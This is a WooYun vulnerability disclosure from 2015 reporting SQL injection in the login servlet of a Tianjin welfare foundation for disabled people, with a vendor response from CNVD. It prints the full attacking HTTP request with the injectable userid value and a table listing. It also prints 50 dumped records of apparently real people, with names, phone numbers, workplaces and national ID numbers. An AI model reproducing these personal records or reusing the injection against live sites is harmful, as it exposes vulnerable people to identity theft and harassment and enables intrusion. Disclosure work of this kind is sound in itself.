当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139687

漏洞标题:天津某福利基金会网站SQL注入(影响近30万用户敏感信息)

相关厂商:天津市残疾人福利基金会

漏洞作者: 深度安全实验室

提交时间:2015-09-10 11:37

修复时间:2015-10-26 14:00

公开时间:2015-10-26 14:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-10: 细节已通知厂商并且等待厂商处理中
2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

天津某福利基金会网站SQL注入(影响近30万用户敏感信息)

详细说明:

天津残疾人福利基金会存在SQL注入

POST /SsoServlet HTTP/1.1
Content-Length: 97
Content-Type: application/x-www-form-urlencoded
Referer: **.**.**.**:80/send.jsp
Cookie: JSESSIONID=94E50C14639545A72E6E2299BBC6F0F0; HMACCOUNT=4B12274FD4648982; Hm_lvt_e982d28ab002a319c21cd5a3b21395e0=1441626582,1441626605,1441626608; Hm_lpvt_e982d28ab002a319c21cd5a3b21395e0=1441626608; BAIDUID=5AAA20C057D74D02868085FE8642F1C7:FG=1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
digest=&fid=F**.**.**.**&om=ajax&password=g00dPa%24%24w0rD&tourl=home/index_send.jsp&userid=1'%22

注入参数 userid

QQ图片20150908110207.png

漏洞证明:

ku.png

28万用户信息包括姓名,电话,工作地址,账户号码等

Database: CJRJJH
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| T_BASEINFO_PERSON              | 289649  |用户
| TEMPEXCEL                      | 9276    |
| CALENDAR_ALL                   | 7670    |
| BMS_LOCATION                   | 5682    |
| UAM_USER_CD                    | 3847    |
| SYS_LOG                        | 2187    |
| DM_MX                          | 708     |
| BMS_DOMAINVALUE                | 673     |
| JZJL                           | 604     |
| JZR                            | 594     |
| ZXXX                           | 544     |
| MSG_UNION                      | 520     |
| MSG                            | 449     |

Table: T_BASEINFO_PERSON
[50 entries]
+------+--------------+--------------+------------------------+
| NAME | PHONE_NO     | WORK_ADDRESS | CARD_NUM               |
+------+--------------+--------------+------------------------+
| 焦锋   | 28256617     | 无            | 12010319811028321513   |
| 王广迎  | 13512841290  | 宾江商厦购物中心家电部  | NULL                   |
| 吕红贺  | 2923-7934    | NULL         | 12022419450311075243   |
| 李春明  | 13502067618  | NULL         | 12010419590301351744   |
| 高廷忠  | NULL         | 上仓镇八营村       | NULL                   |
| 丁长柱  | 60735398     | NULL         | 12022319550708331522   |
| 顾伟   | 28239341     | 无            | 12010319830311171962   |
| 郑德馨  | 26563875     | NULL         | 12010619630507105263   |
| 赵宝林  | NULL         | NULL         | NULL                   |
| 马丽霞  | 25307033     | 无            | 12010719640322452243   |
| 赵秀兰  | NULL         | NULL         | NULL                   |
| 金余   | 13194649858  | NULL         | 12022519361020027X44   |
| 胡昆山  | 68691975     | 静海镇供销社       | 12022319600901537322   |
| 张怀红  | 15002259790  | NULL         | 12011319710212441543   |
| 肖同义  | NULL         | NULL         | NULL                   |
| 董淑娴  | NULL         | NULL         | NULL                   |
| 蔡贵武  | NULL         | NULL         | NULL                   |
| 韩秀华  | 13612195813  | NULL         | 12010319580223382114   |
| 孙振贵  | NULL         | 市手表厂         | NULL                   |
| 苏宝铎  | 13299981136  | NULL         | 12010319530404173921   |
| 于宝忠  | 81310646     | NULL         | 12010419570604157843   |
| 王鹏   | 13920972255  | 天津碧龙有限公司     | 12010819820223051843   |
| 陈风娟  | 15802243460  | 无            | 12011019630630152054   |
| 杨家伟  | 15822303918  | NULL         | 12011119741210451321B2 |
| 刘思   | 23385033     | 市友谊商场        | 12010119600711102663   |
| 赵文革  | 13752744957  | 无业           | 12011019671201123843   |
| 李美丽  | 26792831     | 无            | 12022119841230202921   |
| 王磊   | 13821839705  | 杨津庄镇霍苏庄村     | 12022519940405542754   |
| 张淑芳  | 135416150787 | 无            | 12010719750530602143   |
| 刘毓春  | 28196972     | 无            | 12010319581230481443   |
| 朱新瑞  | 27376023     | NULL         | 12010419571202321054   |
| 皇甫建英 | 81816334     | NULL         | 12010219551104246342   |
| 刘海明  | NULL         | 穿芳峪乡北台头村     | NULL                   |
| 田刚   | 15922099958  | 大港兴源化工厂      | 12010919630414451143   |
| 刘静   | 13502067936  | NULL         | 12022319950501122843   |
| 李英   | 26980908     | 无            | 12011319820320202653   |
| 王建莉  | 84943057     | NULL         | 12010219801020246942   |
| 白桂香  | NULL         | NULL         | NULL                   |
| 刘文艳  | NULL         | NULL         | NULL                   |
| 邢纪强  | 81890158     | 无            | 12010319520106613243   |
| 陈世宝  | 13752556724  | NULL         | 12010519381217331X21   |
| 刘海林  | 63146919     | NULL         | 12010919550110501543   |
| 刘宝和  | 86655059     | 市十二塑料厂       | 12010519520103301814   |
| 邢淑琴  | 13072067359  | NULL         | 12010619581227452x14   |
| 吴英   | 88170019     | 无            | 12010219620211150353   |
| 张俊海  | 13820238612  | 无            | 12010719610428601051   |
| 曹秀莉  | 13682192400  | 天津消防器材总厂     | 12010519580215486X62   |
| 孙景华  | 13163060975  | 无            | 12010719690630632751   |
| 付玉书  | 13821385956  | NULL         | 12022519541123222743   |
| 孙桂敏  | 88324216     | NULL         | 12010319540926512221   |
+------+--------------+--------------+------------------------+

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-11 13:58

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给天津分中心,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论